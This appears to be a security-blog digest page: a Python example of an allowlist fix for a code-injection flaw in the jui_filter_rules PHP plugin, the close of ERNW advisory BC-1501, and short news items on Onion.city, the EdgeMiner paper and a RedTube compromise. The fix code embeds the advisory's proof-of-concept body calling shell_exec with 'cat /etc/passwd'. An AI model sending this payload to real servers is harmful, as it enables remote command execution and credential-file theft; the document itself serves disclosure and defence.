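Added example (Python, not the plugin's code and not part of the advisory) of the mapping/whitelist approach just described: a parser that decodes the PHP-style bracket keys of the PoC body above into the nested structure the PHP side sees, and a conversion step that resolves function_name through a fixed mapping instead of call_user_func_array and refuses client-supplied args. The two permitted conversions (date_to_unix, to_upper) and the legitimate rule body in the test are assumptions; the PoC body is the one from the advisory, re-joined onto one line.

```python
import datetime
import re
from urllib.parse import parse_qsl

# The PoC request body from above, re-joined onto one line (constructed copy).
POC_BODY = (
    "a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=shell_exec"
    "&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D="
    "&a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpasswd"
    "&pst_placeholder=question_mark&a_rules%5B0%5D%5Belement_rule_id%5D=foo&use_ps=yes"
    "&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field"
    "&a_rules%5B0%5D%5Bcondition%5D%5Boperator%5D=equal"
    "&a_rules%5B0%5D%5Bcondition%5D%5BfilterType%5D=date"
)

KEY_RE = re.compile(r"^([^\[\]]+)((?:\[[^\]]*\])*)$")


def parse_php_form(body):
    """Decodes PHP-style bracket keys (a_rules[0][condition][field]) into nested
    dicts, which is how the PHP side sees $_POST['a_rules']."""
    root = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = KEY_RE.match(key)
        if not m:
            continue
        path = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = root
        for part in path[:-1]:
            if not isinstance(node.get(part), dict):
                node[part] = {}
            node = node[part]
        node[path[-1]] = value
    return root


def _date_to_unix(value):
    dt = datetime.datetime.strptime(value, "%Y-%m-%d").replace(tzinfo=datetime.timezone.utc)
    return int(dt.timestamp())


# The allowlist (assumed set): the only conversions a submitted rule may name.
# Each takes the rule's own filter value and nothing else.
CONVERSIONS = {
    "date_to_unix": _date_to_unix,
    "to_upper": str.upper,
}


class RuleRejected(Exception):
    pass


def convert_filter_value(rule):
    """Replacement for the conversion step of create_filter_value_sql: the name
    is looked up in CONVERSIONS instead of being handed to call_user_func_array,
    and caller-supplied 'args' are refused outright."""
    value = rule.get("condition", {}).get("filterValue", "")
    conv = rule.get("filter_value_conversion_server_side")
    if conv is None:
        return value
    name = conv.get("function_name", "")
    if name not in CONVERSIONS:
        raise RuleRejected("conversion %r is not permitted" % name)
    if "args" in conv:
        raise RuleRejected("conversion arguments may not be supplied by the client")
    return CONVERSIONS[name](value)


def convert_all_rules(body):
    """Parses a request body and returns {element_rule_id: converted value}."""
    rules = parse_php_form(body).get("a_rules", {})
    return {rule.get("element_rule_id", idx): convert_filter_value(rule)
            for idx, rule in rules.items()}
```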


Affected Versions
=================
>= git commit b1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b
< 1.0.6 (commit 0b61463cd02cc1814046b516242779b29ba7d1e1)


Timeline
========
2015-01-12: Vulnerability found
2015-01-13: Developer informed
2015-02-14: Fixed in version 1.0.6 (git 0b61463cd02cc1814046b516242779b29ba7d1e1)


References
==========
[1] http://www.pontikis.net/labs/jui_filter_rules
[2] https://www.owasp.org/index.php/Code_Injection
[3] https://www.ernw.de/download/BC-1501.txt
[4] https://bufferoverflow.eu/BC-1501.txt


Advisory-ID
===========
BC-1501


Disclaimer
==========
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

--
Timo Schmid

ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg  -  www.ernw.de
Tel. +49 6221 48039-0 (HQ) - Fax +49 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0

Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey


Onion.city - a search engine bringing the Dark Web into the light

The Dark Web is reflecting a little more light these days.
more here......https://nakedsecurity.sophos.com/2015/02/18/onion-city-a-search-engine-bringing-the-dark-web-into-the-light/

Paper: EdgeMiner: Automatically Detecting Implicit Control Flow Transitions through the Android Framework

Abstract—A wealth of recent research proposes static data flow analysis for the security analysis of Android applications. One of the building blocks that these analysis systems rely upon is the computation of a precise control flow graph. The callback mechanism provided and orchestrated by the Android framework makes the correct generation of the control flow graph a challenging endeavor. From the analysis' point of view, the invocation of a callback is an implicit control flow transition facilitated by the framework. Existing static analysis tools model callbacks through either manually curated lists or ad-hoc heuristics. This work demonstrates that both approaches are insufficient, and allow malicious applications to evade detection by state-of-the-art analysis systems.

To address the challenge of implicit control flow transitions (i.e., callbacks) through the Android framework, we are the first to propose, implement, and evaluate a systematic treatment of this aspect. Our implementation, called EdgeMiner, statically analyzes the entire Android framework to automatically generate API summaries that describe implicit control flow transitions through the Android framework. We use EdgeMiner to analyze three major versions of the Android framework. EdgeMiner identified 19,647 callbacks in Android 4.2, suggesting that a manual treatment of this challenge is likely infeasible. Our evaluation demonstrates that the current insufficient treatment of callbacks in state-of-the-art analysis tools results in unnecessary imprecision.

more here..........http://www.edgeminer.org/

Top Adult Site RedTube Compromised, Redirects to Malware

We’ve documented adult sites leading to malware before on this blog, but this one is a little bit different.

This time around, the source of the problem is not malvertising, but rather a malicious iframe placed directly in the source code of redtube[dot]com, a pornographic site that boasts over 300 million visits a month.

more here..........https://blog.malwarebytes.org/exploits-2/2015/02/top-adult-site-redtube-compromised-redirects-to-malware/